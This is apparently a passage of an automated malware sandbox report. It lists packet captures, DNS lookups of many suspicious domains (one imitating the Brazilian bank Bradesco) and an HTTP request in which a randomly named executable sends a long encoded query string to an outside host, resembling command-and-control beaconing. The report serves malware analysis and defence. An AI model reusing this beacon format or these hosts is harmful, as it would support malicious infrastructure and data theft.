Oct 9, 2024 16:32:03.957350016 CEST	80	50028	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:03.960681915 CEST	50028	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:03.971012115 CEST	50028	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:03.978266954 CEST	80	50028	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:04.856770992 CEST	80	50028	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:04.856791973 CEST	80	50028	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:04.856803894 CEST	80	50028	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:04.856815100 CEST	80	50028	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:04.856826067 CEST	80	50028	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:04.856837034 CEST	80	50028	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:04.856848955 CEST	80	50028	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:04.856858969 CEST	80	50028	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:04.856873989 CEST	80	50028	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:04.856874943 CEST	50028	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:04.857033014 CEST	50028	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:04.857064009 CEST	80	50028	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:04.857161045 CEST	50028	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:05.474430084 CEST	50028	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:06.494656086 CEST	50029	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:06.499752998 CEST	80	50029	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:06.499892950 CEST	50029	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:06.512648106 CEST	50029	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:06.517621040 CEST	80	50029	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:06.518201113 CEST	80	50029	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:07.390016079 CEST	80	50029	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:07.390055895 CEST	80	50029	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:07.390067101 CEST	80	50029	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:07.390079021 CEST	80	50029	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:07.390100002 CEST	80	50029	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:07.390110970 CEST	80	50029	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:07.390120029 CEST	80	50029	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:07.390130997 CEST	80	50029	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:07.390136003 CEST	50029	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:07.390141964 CEST	80	50029	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:07.390152931 CEST	80	50029	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:07.390189886 CEST	50029	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:07.390213013 CEST	50029	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:07.390268087 CEST	80	50029	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:07.390306950 CEST	50029	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:08.023266077 CEST	50029	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:09.040977955 CEST	50030	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:09.046107054 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:09.046181917 CEST	50030	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:09.056571007 CEST	50030	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:09.061572075 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:09.957093954 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:09.957165956 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:09.957201004 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:09.957220078 CEST	50030	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:09.957233906 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:09.957268000 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:09.957299948 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:09.957305908 CEST	50030	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:09.957334042 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:09.957348108 CEST	50030	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:09.957365990 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:09.957401991 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:09.957406044 CEST	50030	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:09.957437992 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:09.957475901 CEST	50030	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:09.962408066 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:09.962565899 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:09.962635994 CEST	50030	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:10.253524065 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:10.253541946 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:10.253561974 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:10.253573895 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:10.253586054 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:10.253597975 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:10.253609896 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:10.253623962 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:10.253635883 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:10.253647089 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:10.253658056 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:10.253671885 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:10.253679037 CEST	50030	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:10.253683090 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:10.253695011 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:10.253703117 CEST	50030	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:10.253705978 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:10.253716946 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:10.253717899 CEST	50030	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:10.253730059 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:10.253740072 CEST	50030	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:10.253741026 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:10.253752947 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:10.253763914 CEST	50030	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:10.253767014 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:10.253777027 CEST	80	50030	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:10.253787041 CEST	50030	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:10.253873110 CEST	50030	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:10.257996082 CEST	50030	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:10.262871027 CEST	80	50030	45.197.45.172	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 9, 2024 16:28:45.968257904 CEST	62149	53	192.168.2.5	1.1.1.1
Oct 9, 2024 16:28:46.057576895 CEST	53	62149	1.1.1.1	192.168.2.5
Oct 9, 2024 16:29:01.821944952 CEST	63406	53	192.168.2.5	1.1.1.1
Oct 9, 2024 16:29:01.990930080 CEST	53	63406	1.1.1.1	192.168.2.5
Oct 9, 2024 16:29:15.274753094 CEST	53696	53	192.168.2.5	1.1.1.1
Oct 9, 2024 16:29:15.292928934 CEST	53	53696	1.1.1.1	192.168.2.5
Oct 9, 2024 16:29:23.352890015 CEST	57347	53	192.168.2.5	1.1.1.1
Oct 9, 2024 16:29:24.349498987 CEST	57347	53	192.168.2.5	1.1.1.1
Oct 9, 2024 16:29:24.416743040 CEST	53	57347	1.1.1.1	192.168.2.5
Oct 9, 2024 16:29:24.416763067 CEST	53	57347	1.1.1.1	192.168.2.5
Oct 9, 2024 16:29:37.993400097 CEST	61821	53	192.168.2.5	1.1.1.1
Oct 9, 2024 16:29:38.300725937 CEST	53	61821	1.1.1.1	192.168.2.5
Oct 9, 2024 16:29:51.899585009 CEST	61420	53	192.168.2.5	1.1.1.1
Oct 9, 2024 16:29:52.896322012 CEST	61420	53	192.168.2.5	1.1.1.1
Oct 9, 2024 16:29:53.087426901 CEST	53	61420	1.1.1.1	192.168.2.5
Oct 9, 2024 16:29:53.087641954 CEST	53	61420	1.1.1.1	192.168.2.5
Oct 9, 2024 16:30:06.840656042 CEST	58268	53	192.168.2.5	1.1.1.1
Oct 9, 2024 16:30:07.162009001 CEST	53	58268	1.1.1.1	192.168.2.5
Oct 9, 2024 16:30:20.712198973 CEST	54417	53	192.168.2.5	1.1.1.1
Oct 9, 2024 16:30:20.726418018 CEST	53	54417	1.1.1.1	192.168.2.5
Oct 9, 2024 16:30:34.305921078 CEST	60918	53	192.168.2.5	1.1.1.1
Oct 9, 2024 16:30:35.044220924 CEST	53	60918	1.1.1.1	192.168.2.5
Oct 9, 2024 16:30:43.111238003 CEST	57247	53	192.168.2.5	1.1.1.1
Oct 9, 2024 16:30:43.276153088 CEST	53	57247	1.1.1.1	192.168.2.5
Oct 9, 2024 16:30:56.618653059 CEST	63197	53	192.168.2.5	1.1.1.1
Oct 9, 2024 16:30:56.850310087 CEST	53	63197	1.1.1.1	192.168.2.5
Oct 9, 2024 16:31:10.196527004 CEST	53285	53	192.168.2.5	1.1.1.1
Oct 9, 2024 16:31:10.233025074 CEST	53	53285	1.1.1.1	192.168.2.5
Oct 9, 2024 16:31:23.557907104 CEST	51847	53	192.168.2.5	1.1.1.1
Oct 9, 2024 16:31:23.569200039 CEST	53	51847	1.1.1.1	192.168.2.5
Oct 9, 2024 16:31:31.641661882 CEST	51540	53	192.168.2.5	1.1.1.1
Oct 9, 2024 16:31:31.652462959 CEST	53	51540	1.1.1.1	192.168.2.5
Oct 9, 2024 16:31:45.931788921 CEST	57918	53	192.168.2.5	1.1.1.1
Oct 9, 2024 16:31:46.449296951 CEST	53	57918	1.1.1.1	192.168.2.5
Oct 9, 2024 16:32:00.205115080 CEST	58712	53	192.168.2.5	1.1.1.1
Oct 9, 2024 16:32:01.209274054 CEST	58712	53	192.168.2.5	1.1.1.1
Oct 9, 2024 16:32:01.395982027 CEST	53	58712	1.1.1.1	192.168.2.5
Oct 9, 2024 16:32:01.396102905 CEST	53	58712	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 9, 2024 16:28:45.968257904 CEST	192.168.2.5	1.1.1.1	0xf53c	Standard query (0)	www.redimpact.online	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:01.821944952 CEST	192.168.2.5	1.1.1.1	0x70d8	Standard query (0)	www.personal-loans-jp8.xyz	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:15.274753094 CEST	192.168.2.5	1.1.1.1	0xa61b	Standard query (0)	www.pelus-pijama-pro.shop	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:23.352890015 CEST	192.168.2.5	1.1.1.1	0x253b	Standard query (0)	www.cs0724sd92jj.cloud	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:24.349498987 CEST	192.168.2.5	1.1.1.1	0x253b	Standard query (0)	www.cs0724sd92jj.cloud	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:37.993400097 CEST	192.168.2.5	1.1.1.1	0x1568	Standard query (0)	www.clientebradesco.online	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:51.899585009 CEST	192.168.2.5	1.1.1.1	0xef0c	Standard query (0)	www.www00437.email	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:52.896322012 CEST	192.168.2.5	1.1.1.1	0xef0c	Standard query (0)	www.www00437.email	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:30:06.840656042 CEST	192.168.2.5	1.1.1.1	0x5eb5	Standard query (0)	www.anthonyholland.net	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:30:20.712198973 CEST	192.168.2.5	1.1.1.1	0x5c6	Standard query (0)	www.726075.buzz	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:30:34.305921078 CEST	192.168.2.5	1.1.1.1	0xc02d	Standard query (0)	www.siyue.xyz	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:30:43.111238003 CEST	192.168.2.5	1.1.1.1	0x9648	Standard query (0)	www.oxilo.info	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:30:56.618653059 CEST	192.168.2.5	1.1.1.1	0xdd93	Standard query (0)	www.farukugurluakdogan.xyz	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:31:10.196527004 CEST	192.168.2.5	1.1.1.1	0xb0ea	Standard query (0)	www.cy-nrg.info	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:31:23.557907104 CEST	192.168.2.5	1.1.1.1	0x9cb6	Standard query (0)	www.woshop.online	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:31:31.641661882 CEST	192.168.2.5	1.1.1.1	0x2c1a	Standard query (0)	www.57ddu.top	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:31:45.931788921 CEST	192.168.2.5	1.1.1.1	0x9c05	Standard query (0)	www.318st.com	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:32:00.205115080 CEST	192.168.2.5	1.1.1.1	0xa77f	Standard query (0)	www.yjsdhy.top	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:32:01.209274054 CEST	192.168.2.5	1.1.1.1	0xa77f	Standard query (0)	www.yjsdhy.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 9, 2024 16:28:46.057576895 CEST	1.1.1.1	192.168.2.5	0xf53c	No error (0)	www.redimpact.online		194.58.112.174	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:01.990930080 CEST	1.1.1.1	192.168.2.5	0x70d8	No error (0)	www.personal-loans-jp8.xyz		199.59.243.227	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:15.292928934 CEST	1.1.1.1	192.168.2.5	0xa61b	Name error (3)	www.pelus-pijama-pro.shop	none	none	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:24.416743040 CEST	1.1.1.1	192.168.2.5	0x253b	No error (0)	www.cs0724sd92jj.cloud	yuanda.zhongshengxinyun.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 9, 2024 16:29:24.416743040 CEST	1.1.1.1	192.168.2.5	0x253b	No error (0)	yuanda.zhongshengxinyun.com		119.28.49.194	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:24.416763067 CEST	1.1.1.1	192.168.2.5	0x253b	No error (0)	www.cs0724sd92jj.cloud	yuanda.zhongshengxinyun.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 9, 2024 16:29:24.416763067 CEST	1.1.1.1	192.168.2.5	0x253b	No error (0)	yuanda.zhongshengxinyun.com		119.28.49.194	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:38.300725937 CEST	1.1.1.1	192.168.2.5	0x1568	No error (0)	www.clientebradesco.online		72.14.178.174	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:38.300725937 CEST	1.1.1.1	192.168.2.5	0x1568	No error (0)	www.clientebradesco.online		96.126.123.244	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:38.300725937 CEST	1.1.1.1	192.168.2.5	0x1568	No error (0)	www.clientebradesco.online		45.79.19.196	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:38.300725937 CEST	1.1.1.1	192.168.2.5	0x1568	No error (0)	www.clientebradesco.online		173.255.194.134	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:38.300725937 CEST	1.1.1.1	192.168.2.5	0x1568	No error (0)	www.clientebradesco.online		72.14.185.43	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:38.300725937 CEST	1.1.1.1	192.168.2.5	0x1568	No error (0)	www.clientebradesco.online		45.33.2.79	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:38.300725937 CEST	1.1.1.1	192.168.2.5	0x1568	No error (0)	www.clientebradesco.online		198.58.118.167	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:38.300725937 CEST	1.1.1.1	192.168.2.5	0x1568	No error (0)	www.clientebradesco.online		45.33.18.44	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:38.300725937 CEST	1.1.1.1	192.168.2.5	0x1568	No error (0)	www.clientebradesco.online		45.56.79.23	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:38.300725937 CEST	1.1.1.1	192.168.2.5	0x1568	No error (0)	www.clientebradesco.online		45.33.20.235	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:38.300725937 CEST	1.1.1.1	192.168.2.5	0x1568	No error (0)	www.clientebradesco.online		45.33.30.197	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:38.300725937 CEST	1.1.1.1	192.168.2.5	0x1568	No error (0)	www.clientebradesco.online		45.33.23.183	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:53.087426901 CEST	1.1.1.1	192.168.2.5	0xef0c	No error (0)	www.www00437.email	ff02.jog2798q68sjchze.app		CNAME (Canonical name)	IN (0x0001)	false
Oct 9, 2024 16:29:53.087426901 CEST	1.1.1.1	192.168.2.5	0xef0c	No error (0)	ff02.jog2798q68sjchze.app	tkdz666.w.keilao.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 9, 2024 16:29:53.087426901 CEST	1.1.1.1	192.168.2.5	0xef0c	No error (0)	tkdz666.w.keilao.com		103.144.219.16	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:29:53.087641954 CEST	1.1.1.1	192.168.2.5	0xef0c	No error (0)	www.www00437.email	ff02.jog2798q68sjchze.app		CNAME (Canonical name)	IN (0x0001)	false
Oct 9, 2024 16:29:53.087641954 CEST	1.1.1.1	192.168.2.5	0xef0c	No error (0)	ff02.jog2798q68sjchze.app	tkdz666.w.keilao.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 9, 2024 16:29:53.087641954 CEST	1.1.1.1	192.168.2.5	0xef0c	No error (0)	tkdz666.w.keilao.com		103.144.219.16	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:30:07.162009001 CEST	1.1.1.1	192.168.2.5	0x5eb5	No error (0)	www.anthonyholland.net	anthonyholland.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 9, 2024 16:30:07.162009001 CEST	1.1.1.1	192.168.2.5	0x5eb5	No error (0)	anthonyholland.net		84.32.84.32	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:30:20.726418018 CEST	1.1.1.1	192.168.2.5	0x5c6	No error (0)	www.726075.buzz		47.57.185.227	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:30:43.276153088 CEST	1.1.1.1	192.168.2.5	0x9648	No error (0)	www.oxilo.info		162.0.213.94	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:30:56.850310087 CEST	1.1.1.1	192.168.2.5	0xdd93	No error (0)	www.farukugurluakdogan.xyz	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 9, 2024 16:30:56.850310087 CEST	1.1.1.1	192.168.2.5	0xdd93	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 9, 2024 16:30:56.850310087 CEST	1.1.1.1	192.168.2.5	0xdd93	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:31:10.233025074 CEST	1.1.1.1	192.168.2.5	0xb0ea	No error (0)	www.cy-nrg.info		217.160.0.147	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:31:23.569200039 CEST	1.1.1.1	192.168.2.5	0x9cb6	Name error (3)	www.woshop.online	none	none	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:31:31.652462959 CEST	1.1.1.1	192.168.2.5	0x2c1a	No error (0)	www.57ddu.top	57ddu.top		CNAME (Canonical name)	IN (0x0001)	false
Oct 9, 2024 16:31:31.652462959 CEST	1.1.1.1	192.168.2.5	0x2c1a	No error (0)	57ddu.top		154.23.184.218	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:31:46.449296951 CEST	1.1.1.1	192.168.2.5	0x9c05	No error (0)	www.318st.com		107.163.96.57	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:32:01.395982027 CEST	1.1.1.1	192.168.2.5	0xa77f	No error (0)	www.yjsdhy.top		45.197.45.172	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:32:01.396102905 CEST	1.1.1.1	192.168.2.5	0xa77f	No error (0)	www.yjsdhy.top		45.197.45.172	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.redimpact.online

www.personal-loans-jp8.xyz

www.cs0724sd92jj.cloud

www.clientebradesco.online

www.www00437.email

www.anthonyholland.net

www.726075.buzz

www.oxilo.info

www.farukugurluakdogan.xyz

www.cy-nrg.info

www.57ddu.top

www.318st.com

www.yjsdhy.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49811	194.58.112.174	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:28:46.075689077 CEST	506	OUT	GET /igto/?-n1P=0hFdS6&1Dd0AZ=8YFnU67lyalxhD6YAq63dHcF/xhcFCtDVk0hyUkc2gzBxzKJj8V8IimbyLXPMQTMLAK7+VkEGKl8Gj8O4yEU/qETkCuAbtbCtj2w9LUvHfPFzdZQ+0e4bLhl1yfV/l2PPQ== HTTP/1.1 Host: www.redimpact.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Oct 9, 2024 16:28:46.779721975 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 14:28:46 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 32 39 36 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 72 65 64 69 6d 70 61 63 74 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 [TRUNCATED] Data Ascii: 2969<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.redimpact.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/<![CDATA[/window.trackScriptLoad = function(){};/.../</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text">  <a class="b-link" href="https://reg. [TRUNCATED]
Oct 9, 2024 16:28:46.779875994 CEST	1236	IN	Data Raw: 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f Data Ascii: v><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.redimpact.online</h1><p class="b-parking__he
Oct 9, 2024 16:28:46.779887915 CEST	1236	IN	Data Raw: d0 b3 d0 b8 d0 b5 20 d1 83 d1 81 d0 bb d1 83 d0 b3 d0 b8 20 d0 a0 d0 b5 d0 b3 2e d1 80 d1 83 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 Data Ascii: .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_typ
Oct 9, 2024 16:28:46.779901028 CEST	1236	IN	Data Raw: 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 22 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f Data Ascii: ></li></ul><div class="b-parking__button-wrapper"><a class="b-button b-button_color_primary b-button_style_wide b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_hosting" href="https://www.reg.ru/h
Oct 9, 2024 16:28:46.779911995 CEST	1236	IN	Data Raw: 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 73 65 72 76 65 72 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f 61 75 74 6f 22 3e d0 97 d0 b0 d0 ba d0 b0 d0 b7 d0 b0 Data Ascii: edium=parking&utm_campaign=s_land_server&reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__promo-item_type_cms"><strong class="b-title b-title_size_large-compact">
Oct 9, 2024 16:28:46.779922962 CEST	1236	IN	Data Raw: ba d0 be 20 d0 bc d0 b8 d0 bd d1 83 d1 82 2e 3c 2f 70 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f 72 5f 72 65 66 65 72 65 6e 63 65 20 62 2d 62 75 74 74 6f 6e 5f 73 74 79 6c 65 5f 62 6c 6f 63 Data Ascii: .</p><a class="b-button b-button_color_reference b-button_style_block b-button_size_medium-compact b-button_text-size_normal" href="https://www.reg.ru/web-sites/website-builder/?utm_source=www.redimpact.online&utm_medium=parking&
